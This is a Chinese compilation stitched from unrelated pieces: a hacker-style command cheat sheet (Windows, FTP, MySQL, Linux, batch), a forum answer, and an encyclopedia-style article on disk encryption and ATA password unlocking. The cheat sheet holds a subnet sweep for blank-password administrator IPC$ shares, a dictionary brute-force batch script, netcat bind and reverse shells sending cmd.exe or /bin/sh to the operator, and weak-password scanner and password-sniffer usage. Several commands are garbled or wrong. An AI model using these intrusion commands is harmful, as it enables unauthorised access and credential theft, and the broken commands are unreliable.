chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误
tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口
exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe
path 路径\可执行文件的文件名 为可执行文件设置一个路径。
cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?
regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;
regedit /e 注册表文件名 导出注册表
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
cacls 文件名 查看文件的访问用户权限列表
REM 文本内容 在批处理文件中添加注解
netsh 查看或更改本地网络配置情况
#4 四:
IIS服务命令:
iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)
iisreset /start或stop 启动(停止)所有Internet服务
iisreset /restart 停止然后重新启动所有Internet服务
iisreset /status 显示所有Internet服务状态
iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机
iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务
iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。
FTP 命令: (后面有详细说明内容)
ftp的命令行格式为:
ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。
-d 使用调试方式。
-n 限制ftp的自动登录,即不使用.netrc文件。
-g 取消全局文件名。
help [命令] 或 ?[命令] 查看命令说明
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
pwd 列出当前远端主机目录
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
mget [remote-files] 从远端主机接收一批文件至本地主机
mput local-files 将本地主机中一批文件传送至远端主机
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
ascii 设定以ASCII方式传送文件(缺省值)
bin 或 image 设定以二进制方式传送文件
bell 每完成一次文件传送,报警提示
cdup 返回上一级目录
close 中断与远程服务器的ftp会话(与open对应)
open host[port] 建立指定ftp服务器连接,可指定连接端口
delete 删除远端主机中的文件
mdelete [remote-files] 删除一批文件
mkdir directory-name 在远端主机中建立目录
rename [from] [to] 改变远端主机中的文件名
rmdir directory-name 删除远端主机中的目录
status 显示当前FTP的状态
system 显示远端主机系统类型
user user-name [password] [account] 重新以别的用户名登录远端主机
open host [port] 重新建立一个新的连接
prompt 交互提示模式
macdef 定义宏命令
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
chmod 改变远端主机的文件权限
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
cd remote-dir 进入远程主机目录
cdup 进入远程主机目录的父目录
! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip
#5 五:
MYSQL 命令:
mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。
(例:mysql -h110.110.110.110 -Uroot -P123456
注:u与root可以不用加空格,其它也一样)
exit 退出MYSQL
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)
show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。
use mysql;
show tables; 显示库中的数据表
describe 表名; 显示数据表的结构
create database 库名; 建库
use 库名;
create table 表名 (字段设定列表); 建表
drop database 库名;
drop table 表名; 删库和删表
delete from 表名; 将表中记录清空
select * from 表名; 显示表中的记录
mysqldump --opt schoolschool.bbb 备份数据库:(命令在DOS的\\mysql\\bin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。
win2003系统下新增命令(实用部份):
shutdown /参数 关闭或重启本地或远程主机。
参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。
例:shutdown /r /t 0 立即重启本地主机(无延时)
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。
#6 六:
Linux系统下基本命令: 要区分大小写
uname 显示版本信息(同win2K的 ver)
dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)
pwd 查询当前所在的目录位置
cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。
cat 文件名 查看文件内容
cat abc.txt 往abc.txt文件中写上内容。
more 文件名 以一页一页的方式显示一个文本文件。
cp 复制文件
mv 移动文件
rm 文件名 删除文件,rm -a 目录名删除目录及子目录
mkdir 目录名 建立目录
rmdir 删除子目录,目录内没有文档。
chmod 设定档案或目录的存取权限
grep 在档案中查找字符串
diff 档案文件比较
find 档案搜寻
date 现在的日期、时间
who 查询目前和你使用同一台机器的人以及Login时间地点
w 查询目前上机者的详细资料
whoami 查看自己的帐号名称
groups 查看某人的Group
passwd 更改密码
history 查看自己下过的命令
ps 显示进程状态
kill 停止某进程
gcc 黑客通常用它来编译C语言写的文件
su 权限转换为指定使用者
telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。
ftp ftp连接上某服务器(同win2K)
附:批处理命令与变量
1:for命令及变量 基本格式:
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。
批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3
(set):指定一个或一组文件,可使用通配符,如:(D:\user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1 }
command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加: 来隔开
command_parameters:为特定命令指定参数或命令行开关
IN (set):指在(set)中取值;DO command :指执行command
参数:/L 指用增量形式{ (set)为增量形式时 };/F 指从文件中不断取值,直到取完为止{ (set)为文件时,如(d:\pass.txt)时 }。
用法举例:
@echo off
echo 用法格式:test.bat *.*.* test.txt
for /L %%G in (1 1 254) do echo %1.%%G test.txt net use \\%1.%%G /user:administrator | find "命令成功完成" test.txt
存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。
/L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位); 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。
@echo off
echo 用法格式:ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存为:ok.exe 说明:输入一个IP后,用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。
#7 七:
2:if命令及变量 基本格式:
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为“真”。
例:IF errorlevel 0 命令 指程序执行后返回的值为0时,就值行后面的命令;IF not errorlevel 1 命令指程序执行最后返回的值不等于1,就执行后面的命令。
0 指发现并成功执行(真);1 指没有发现、没执行(假)。
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就执行后面的命令。
例:“if "%2%"=="4" goto start”指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加" ")
IF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。
例:“if not nc.exe goto end”指:如果没有发现nc.exe文件就跳到":end"标签处。
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用 括起来,因为del命令要单独一行时才能执行,用上 后就等于是单独一行了;例如:“if exist test.txt. del test.txt. else echo test.txt.missing ”,注意命令中的“.”
(二)系统外部命令(均需下载相关工具):
1、瑞士军刀:nc.exe
参数说明:
-h 查看帮助信息
-d 后台模式
-e prog程序重定向,一但连接就执行〔危险〕
-i secs延时的间隔
-l 监听模式,用于入站连接
-L 监听模式,连接天闭后仍然继续监听,直到CTR+C
-n IP地址,不能用域名
-o film记录16进制的传输
-p[空格]端口 本地端口号
-r 随机本地及远程端口
-t 使用Telnet交互方式
-u UDP模式
-v 详细输出,用-vv将更详细
-w数字 timeout延时间隔
-z 将输入,输出关掉(用于扫锚时)
基本用法:
nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口
nc -l -p 80 开启本机的TCP 80端口并监听
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口
高级用法:
nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止
nc -L -p 80 c:\log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:\log.txt
nc -L -p 80 c:\honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用
type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用
本机上用:nc -l -p 本机端口
在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K
nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙
本机上用:nc -d -l -p 本机端口 要传送的文件路径及名称
在对方主机上用:nc -vv 本机IP 本机端口 存放文件的路径及名称 传送文件到对方主机
备 注:
| 管道命令
或 重定向命令。“”,例如:tlntadmn test.txt 指把test.txt的内容赋值给tlntadmn命令
@ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:\winnt d:\log.txt 意思是:后台执行dir,并把结果存在d:\log.txt中
与的区别 ""指:覆盖;""指:保存到(添加到)。
如:@dir c:\winnt d:\log.txt和@dir c:\winnt d:\log.txt二个命令分别执行二次比较看:用的则是把二次的结果都保存了,而用:则只有一次的结果,是因为第二次的结果把第一次的覆盖了。
#8 八:
2、扫锚工具:xscan.exe
基本格式
xscan -host 起始IP[-终止IP] 检测项目 [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息
xscan -file 主机列表文件名 检测项目 [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息
检测项目
-active 检测主机是否存活
-os 检测远程操作系统类型(通过NETBIOS和SNMP协议)
-port 检测常用服务的端口状态
-ftp 检测FTP弱口令
-pub 检测FTP服务匿名用户写权限
-pop3 检测POP3-Server弱口令
-smtp 检测SMTP-Server漏洞
-sql 检测SQL-Server弱口令
-smb 检测NT-Server弱口令
-iis 检测IIS编码/解码漏洞
-cgi 检测CGI漏洞
-nasl 加载Nessus攻击脚本
-all 检测以上所有项目
其它选项
-i 适配器编号 设置网络适配器, 适配器编号可通过"-l"参数获取
-l 显示所有网络适配器
-v 显示详细扫描进度
-p 跳过没有响应的主机
-o 跳过没有检测到开放端口的主机
-t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10
-log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机
#9 九:
3、命令行方式嗅探器: xsniff.exe
可捕获局域网内FTP/SMTP/POP3/HTTP协议密码
参数说明
-tcp 输出TCP数据报
-udp 输出UDP数据报
-icmp 输出ICMP数据报
-pass 过滤密码信息
-hide 后台运行
-host 解析主机名
-addr IP地址 过滤IP地址
-port 端口 过滤端口
-l
如何禁止别人访问我的系统盘及D E F G这些盘 禁止以后别人下载东西的时候能下进去吗?
有5个方法
这是其中一个最容易的,其他的不太方便要不就是还得装其他的软件
1.我们点击开始菜单中的运行,然后输入gpedit.msc 并确定,
2.在左侧找到windows资源管理器,并点击
3在右侧找到“防止从我的电脑访问驱动器”选项
4选择“已启用”选项,然后点击确定按钮
5然后,我们可以测试一下,用鼠标本地磁盘,会提示我们无法访问
这是剩下的四个方法
修改硬盘分区表信息、对硬盘启动加口令、对硬盘实现用户加密管理、对某个逻辑盘实现写保护
都给你说说
修改分区表
硬盘分区表信息对硬盘的启动至关重要,如果找不到有效的分区表,将不能从硬盘启动或即使从软盘启动也找不到硬盘。通常,第一个分区表项的第0子节为80H,表示C盘为活动DOS分区,硬盘能否自举就依靠它。若将该字节改为00H,则不能从硬盘启动,但从软盘启动后,硬盘仍然可以访问。分区表的第4字节是分区类型标志,第一分区的此处通常为06H,表示C盘为活动DOS分区,若对第一分区的此处进行修改可对硬盘起到一定加密作用。
具体表现在:
1.若将该字节改为0,则表示该分区未使用,当然不能再从C盘启动了。从软盘启动后,原来的C盘不见了,你看到的C盘是原来的D盘,D盘是原来的E盘,依此类推。
2.若将此处字节改为05H,则不但不能从硬盘启动,即使从软盘启动,硬盘的每个逻辑盘都不可访问,这样等于整个硬盘被加密了。另外,硬盘主引导记录的有效标志是该扇区的最后两字节为55AAH。若将这两字节变为0,也可以实现对整个硬盘加锁而不能被访问。硬盘分区表在物理0柱面0磁头1扇区,可以用NortonforWin95中的Diskedit直接将该扇区调出并修改后存盘。或者在Debug下用INT13H的02H子功能将0柱面0磁头1扇区读到内存,在相应位置进行修改,再用INT13H的03H子功能写入0柱面0磁头1扇区就可以了 纽曼r007上面的加密处理,对一般用户来讲已足够了。但对有经验的用户,即使硬盘不可访问,也可以用INT13H的02H子功能将0柱面0磁头1扇区读出,根据经验将相应位置数据进行修改,可以实现对硬盘解锁,因为这些位置的数据通常是固定的或有限的几种情形。另外一种保险但显得笨拙的方法是将硬盘的分区表项备份起来,然后将其全部变为0,这样别人由于不知道分区信息,就无法对硬盘解锁和访问硬盘了。
启动口令
我们知道,在CMOS中可以设置系统口令,使非法用户无法启动计算机,当然也就无法使用硬盘了。但这并未真正锁住硬盘,因为只要将硬盘挂在别的计算机上,硬盘上的数据和软件仍可使用。要对硬盘启动加口令,可以首先将硬盘0柱面0磁头1扇区的主引导记录和分区信息都储存在硬盘并不使用的隐含扇区,比如0柱面0磁头3扇区。然后用Debug重写一个不超过512字节的程序(实际上100多字节足矣)装载到硬盘0柱面0磁头1扇区。该程序的功能是执行它时首先需要输入口令,若口令不对则进入死循环;若口令正确则读取硬盘上存有主引导记录和分区信息的隐含扇区(0柱面0磁头3扇区),并转去执行主引导记录。
由于硬盘启动时首先是BIOS调用自举程序INT19H将主硬盘的0柱面0磁头1扇区的主引导记录读入内存0000:7C00H处执行,而我们已经偷梁换柱,将0柱面0磁头1扇区变为我们自己设计的程序。这样从硬盘启动时,首先执行的不是主引导程序,而是我们设计的程序。在执行我们设计的程序时,口令若不对则无法继续执行,也就无法启动了。即使从软盘启动,由于0柱面0磁头1扇区不再有分区信息,硬盘也不能被访问了。当然还可以将我们设计的程序像病毒一样,将其中一部分驻留在高端内存,监视INT13H的使用,防止0柱面0磁头1扇区被改写。
硬盘加密卡
用户加密
UNIX操作系统可以实现多用户管理,在DOS系统下,将硬盘管理系统进行改进,也可实现类似功能的多用户管理。该管理系统可以满足这样一些要求:1.将硬盘分为公用分区C和若干专用分区D。其中“超级用户”来管理C区,可以对C区进行读写和更新系统;“特别用户”(如机房内部人员)通过口令使用自己的分区,以保护自己的文件和数据;“一般用户”(如到机房上机的普通人员)任意使用划定的公用分区。后两种用户都不能对C盘进行写操作,这样如果把操作系统和大量应用软件装在C盘,就能防止在公共机房中其他人有意或无意地对系统和软件的破坏,保证了系统的安全性和稳定性。2.在系统启动时,需要使用软盘钥匙盘才能启动系统,否则硬盘被锁住,不能被使用。此方法的实现可通过利用硬盘分区表中各逻辑盘的分区链表结构,采用汇编编程来实现。
写保护
我们知道,软盘上有写保护缺口,在对软盘进行写操作前,BIOS要检查软盘状态,如果写保护缺口被封住,则不能进行写操作。而写保护功能对硬盘而言,在硬件上无法进行,但可通过软件来实现。在DOS系统下,磁盘的写操作包括几种情况:①在COMMAND.COM支持下的写操作,如MD、RD、COPY等;②在DOS功能调用中的一些子功能如功能号为10H、13H、3EH、5BH等可以对硬盘进行写操作;③通过INT26H将逻辑扇区转换为绝对扇区进行写;④通过INT13H的子功能号03H、05H等对磁盘进行写操作。但每一种写操作最后都要调用INT13H的子功能去实现。
因此,如果对INT13H进行拦截,可以实现禁止对硬盘特定逻辑盘的写操作。由于磁盘上文件的写操作是通过INT13H的03H子功能进行写,调用此子功能时,寄存器CL表示起始扇区号(实际上只用到低6位);CH表示磁道号,在硬盘即为柱面号,该柱面号用10位表示,其最高两位放在CL的最高两 流程位。对硬盘进行分区时可以将硬盘分为多个逻辑驱动器,而每个逻辑驱动器都是从某一个完整的柱面开始。如笔者的硬盘为2.5GB,分为C、D、E、F、G五个盘。其中C盘起始柱面号为00H,D盘起始柱面号为66H,E盘起始柱面号为E5H,F盘起始柱面号为164H,G盘起始柱面号为26BH。如果对INT13H进行拦截,当AH=03H,并且由CL高两位和CH共同表示的柱面号大于E4H并小于164H,就什么也不做就返回,这样就可以实现对E盘禁止写。
编辑本段依赖方案软盘加密
这是在计算机上最为古老的一种加密方案,它的原理是在软盘的特殊位置写入一些信息,软件在运行时要检验这些信息。这种软盘就好像一把钥匙。软件开发商只需一次投资购买一套加密工具就可以自己制作多张钥匙盘。此方法加密简单,成本低,在软件发展的不同时期都能看到其闪光点。但因为软驱是慢速设备,多次检查软盘上的加密点会大大拖慢程序的运行速度,所以一般加密软件只在软件运行开始的时候检查一次,这样不能避免用户用一张加密盘启动多份软件。而且由于软盘是一种易损载体,加密软件对软盘加密点的反复读写很容易造成软盘的损坏。而这张加密盘又不能备份,软件公司要不断应付用户更换加密盘的请求。另外由于这种加密技术出现得较早,硬解密的技术相对比较成熟,像双星公司的King-Copy软件能拷贝大多数的加密软盘,连加密点一起复制,复制后的软盘还是加密的。
卡加密
在90年代初,各种各样的汉卡涌现出来,随之而来的卡加密技术也风行一时。由于种种问题,这种加密技术现在已经难得一见了。
软件锁
软件锁加密是在国外首先出现的,它是一个插在计算机打印口上火柴盒大小的设备,国内俗称“加密狗”。在加密锁内部存有一定的数据和算法,计算机可以与之通讯来获得其中的数据,或通过加密锁进行某种计算。软件无法离开加密锁而运行。由于它不像卡加密那样需要打开计算机的机箱来安装,但又像加密卡那样可以随时访问,而且访问速度很快,所以一推出就受到软件开发者们的青睐。目前,所有的加密锁都提供了可编程的接口。用户可以控制加密锁中的内容,在程序中通过加密锁的接口任意访问加密锁。国外加密锁一般仅提供若干种算法,但好的加密锁不但可以向客户提供加密算法,也容许客户根据自己的意愿自定义加密算法,容许客户自定义用户ID号。但加密锁也是有一定欠缺的,由于加密锁利用的是计算机的打印口,而打印口原来是为打印机而设计的,软件锁一方面要保证用户加密操作的正确,同时也要保证打印机工作的正常。但由于打印机驱动程序设计上千差万别,没有任何一家的加密锁能够完全做到这一点。
光盘加密
光盘加密
既然有软盘加密成功在先,为什么不能有光盘加密呢?但实际操作上确实是有一些问题的,因为光盘有ISO9660标准协议规定,其可控制性比软盘还要严格,想找出一种只能运行而不能复制的方式确实很困难。但现在确实已经有几家这样的产品出来了,而且加密方法也不尽相同。其主要原理是利用特殊的光盘母盘上的某些特征信息是不可再现的,而且这些特征信息大多是光盘上非数据性的内容,在光盘复制时复制不到的地方。因为投入是一次性的,对于大规模的生产这种加密方案可以将成本降得很低。而且软件数据和加密在同一载体上,对用户无疑是很方便的。但这是一种较新的加密方案,很多方面还需进一步验证。而且由于加密方式所限,不可能在用户自己刻录的光盘上实现这种加密,必须是生产线上生产的光盘才能够实现。这对于一些小规模的软件生产厂商还是有一定困难的,而且由于光盘的只读性,一旦加密有错是无法修复的。
编辑本段其他方案
所有的带有附加硬件设备的加密方案都有一定的加密成本在里面,对于那些价格高昂的软件当然无所谓,但对于那些共享软件或价格本身就很低的软件来说,硬件加密成本可能比软件本身的售价还高,所以近年来产生了很多软加密方案。
密码表
在软件运行的开始要求用户根据屏幕的提示信息输入特定的答案,答案往往在用户手册上的一份防复印的密码表中。用户只有输入密码正确后才能够继续运行。这种加密方案实现简单,不需要太多的成本。但用户每次运行软件都要查找密码,不免使用户感到十分不便。像台湾的游戏大多采用此加密方式。而且往往有一些有耐心者把整个密码表输入到计算机中存成一个文件,同软件的盗版一同公布出来,让加密者无可奈何。基本上是一种防君子不防小人的加密方式。
序列号
这种加密方式从某种角度来讲不是一套完整的加密方案,现今很多Shareware(共享软件)大多采用这种加密方式,用户在软件的试用期是不需要交费的,一旦试用期满还希望继续使用这个软件,就必须到软件公司进行注册,然后软件公司会根据你提交的信息(一般是用户的名字)来生成一个序列号,当你收到这个序列号以后,并在软件运行的时候输入进去,软件会验证你的名字与序列号之间的关系是否正确,如果正确说明你已经购买了这个软件,也就没有日期的限制了。这种加密方案实现简单,而且购买过程也完全在Internet上实现,无论是开发者和购买者都觉得很方便。不过有心的人可能已经注意到软件的名字与序列号之间的验证是在你的计算机上完成的,很多黑客利用这个漏洞找出了名字和序列号之间的换算关系,编写出一种叫KeyMaker的程序,你只要输入你的名字,这个程序会帮助你计算出序列号,再将你的名字和这个序列号输入进软件中就变成正版软件了。而且也没有什么更好的方法来阻止用户扩散他注册后得到的序列号。
许可证
这种方式从某种角度上可以说是序列号加密的一个变种,你从网上下载的或购买过来的软件并不能直接使用,软件在安装时或运行时会对你的计算机进行一番检测,并根据检测结果生成一个你的计算机的特定指纹,这个指纹可以是一个小文件,也可以是一串谁也看不懂的数,你需要把这个指纹数据通过Internet、E-mail、电话、传真等方式发送到开发商那里,开发商再根据这个指纹给你一个注册码或注册文件,你得到这个注册码或注册文件并按软件要求的步骤在你的计算机上完成注册后方能使用。这个方法的买卖也是完全通过网络来进行的,而且用户购买的软件被限制只能在他自己的计算机上面运行,换到其他的计算机上,这个注册码或注册文件可能不再有效。但用户更换某些硬件设备也可能造成注册码的失效,而且用户得到软件后在完成注册工作前会有一段时间无法使用。
编辑本段加密软件MagicLocker
硬盘加密保护工具,MagicLocker采用随机的密钥为文件
紫电硬盘加密神
紫电硬盘加密神是目前独一无二的硬盘分区加密软件。但是不仅仅包括硬盘。实际上软件可以保护任何分区,即使是软驱、光盘驱动器、U盘和移动硬盘。
SecurStarDriveCrypt
为你提供高达1344Bit军用硬盘加密技术,加密速度快,加密强度高
CompuSec
CompuSec是用来保护您的系统的软件,主要使用一些认证机制、硬盘加密保护等来确保系统
PWMBR
一个硬盘加密工具
Prayaya加密王
Prayaya 加密王是在您电脑上创建的一块加密磁盘区域,您可将需要保护的私密文件(照片、视频、财务信息文件等)存放在Prayaya 加密王中。
编辑本段常用软件
U盘、移动硬盘加密工具绿色版(注:此工具可能会对加密文件造成破坏,慎用!) 此加密软件是从高强度文件夹加密软件中的分离出来的无需安装也无需安装原软件、可任意更改你喜欢的名称、没有任何限制也不要注册。可加密任何一个分区或文件夹、加密后的文件夹复制移动到任一台电脑上都需用你的原始密码才能打开(那台电脑上并不需要安装此软件和原软件)支持完全解密和临时解密。类似爱国者的记慧棒U盘加密工具。(本工具保密性很强、即使你打开系统中所有的隐藏文件看到的也只是几个图标也已、不能看不到你的真实文件、此工具没有防删功能如果你删除了这几个隐藏的图标则你的加密文件也删除了。我用文件嗅探器工具也看不到加密后真实的文件。即使你重装系统或GHOST恢复系统也还是需要你的原始密码才能打开。)
编辑本段使用方法
1、将此加密工具复制到你的U盘或移动硬盘根目录中(不是放在文件夹中)则可以加密隐藏U盘或移动硬盘上的所有文件。加密后在U盘或移动硬盘中不能看到你的文件只能看到此工具。但不影响你对U盘或移动硬盘的操作,你的新建立文件将在将在下次加密中一并加密。如果你或他人不慎误删除了此工具,放心你加密的文件还在,只要你将此工具再次复制过来用你原来的密码即可打开。
2、将此加密工具放到文件夹中则只加密当前文件夹。需加密多个文件夹则每个文件夹中都得安放本工具、不同的文件夹可用不同的密码,但密码你必须记牢。
3、此工具也可以在电脑中加密本地分区或本地文件夹。加密后的文件夹如果复制移动到其它电脑上一样需要你的原始密码打后开才能看到文件。
呵呵,这下使用U盘或移动硬盘的朋友可方便了。再也不怕有人看到你的重要文件了
重要声明:不要用此工具加密你系统所在的分区和系统文件夹。重要的文件请先作好备份以防丢失。建议先新建个的文件夹放些不重要的文件加密试用。然后再加密你重要的文件。本人测试加密后的文件夹刻录光盘后无效
编辑本段解锁方法查看硬盘
将被加密的硬盘接好,进入PC3000AT主菜单界面,按下小键盘上的DEL键可以看到该硬盘的当前参数表。翻页到最后一页,可以看到如下信息:
passwordestablished:yes此处若为yes,即此盘被设定了口令;
若为no,即此盘未设口令。
HDDlocked:yes此处说明是否此盘已经被口令锁定。
Sequritylevel:Maximal此处说明口令锁定的安全级别;
只有两种情况:high和maximal。在high级别,可以用Masterpassword进行unlock,数据全部无损;在Maximal级别,不能用Masterpassword直接unlock,而是用Erase命令对全部进行写零才能unlock,数据全部丢失。
Mastercode:$FFFE此处若为$FFFE,即此盘的Masterpassword还是出厂时的默认值;
Mastercode:$FFFE此处若为$FFFE,即此盘的Masterpassword还是出厂时的默认值;
若为00,即说明此盘的Masterpassword不是出厂时的默认值。
一般方法:
1、若知道用户原来设定的口令,可在PC-3000AT主菜单下按小键盘的6键(或右方向键),选择“Disksequritycommands”---“unlockdisk”,输入正确口令,回车,若提示操作成功即为解锁成功;然后,再执行”Clearpassword”,便可完全清除用户设定的口令,此时数据无损。
2、若不知道用户设定的口令,但Masterpassword为$FFFE,且Sequritylevel为high,则解锁步骤同上。但输入密码时须选择Passwordtype:master,并输入正确的masterpassword.
3、若不知道用户设定的口令,但Masterpassword为$FFFE,且Sequritylevel为maximal,则应执行“Disksequritycommands”-“Setpassword”,输入正确的Masterpassword,然后执行“Erasedisk”。经过数十分钟的数据清除过程后,硬盘可恢复到可使用状态,但原有数据全部丢失。
4、若不知道用户设定的口令也不知道Masterpassword,则需要用特别的方法解除密码
5,还可以直接在超级旋风里边输入"文件夹加密软件"下载一个软件就ok了.
编辑本段加密原理
相信大家在日常办公环境里会遇到一些令人尴尬的事情:自己的隐私被人偷看,多人共享一台电脑时自己的文件无处藏身。然而有了“私人磁盘”的出现对一些有保密需求的朋友来说简直就是一个福音,它可以根据用户的定制把自己需要的文件按照需要放到指定的逻辑分区上进行隐藏。在这里我就不对这款软件做过多的评述了,有兴趣的朋友可以到网上下载。本文主要是就”私人磁盘“这款软件进行一个剖析。
该软件是由VB开发出来的,主程序文件名是srcp.exe其中的文件隐藏功能是借用了操作系统自身的一些特性来完成的。“RECYCLER“是一个系统文件夹的名字,它分布在每个分区里面平时都是以系统隐藏属性存放的,所以一般用户没有借助工具是发现不了这个文件的,这个文件夹一般主要是用于存放所在分区的垃圾信息和临时文件。”私人磁盘“就是利用了这个系统赋予的藏身之所存放用户的文件。现在我们就此软件的整个创建私人空间过程进行说明:
第一步点击这个按钮
此时程序后台执行了系统命令subst Z::D:\ Recycled\
subst命令的作用是将指定的文件夹映射成指定的虚拟磁盘,此例中把D盘的那个系统Recycled目录映射成Z盘
第二步点击这个按钮
由于之前已用SUBST命令映射了磁盘,我的电脑已出现了Z盘的盘符,现在就可以像用普通分区一样的进行文件管理。待用完后就可以 ,这时程序内部同样用了SUBST命令进行映射解除。这样用户即使看得到Recycled目录但也无法看到其中的隐藏文件,不过可以通过一些第三方的程序进行查看,像杀毒软件等都可以扫到这些文件。在测试中我借用一个程序来观察结果:
起始目录中中就是私人磁盘的存放点,用这个扫描可以看到我在私人磁盘中存的8个文件共计61K
其实此程序的核心工作就如此简单,它给用户提供了一个友好的界面,使得用户不用去深层次的知晓命令。但与此同时可以看出如果对操作系统有足够的了解,对自己平时的工作也是很有帮助的。
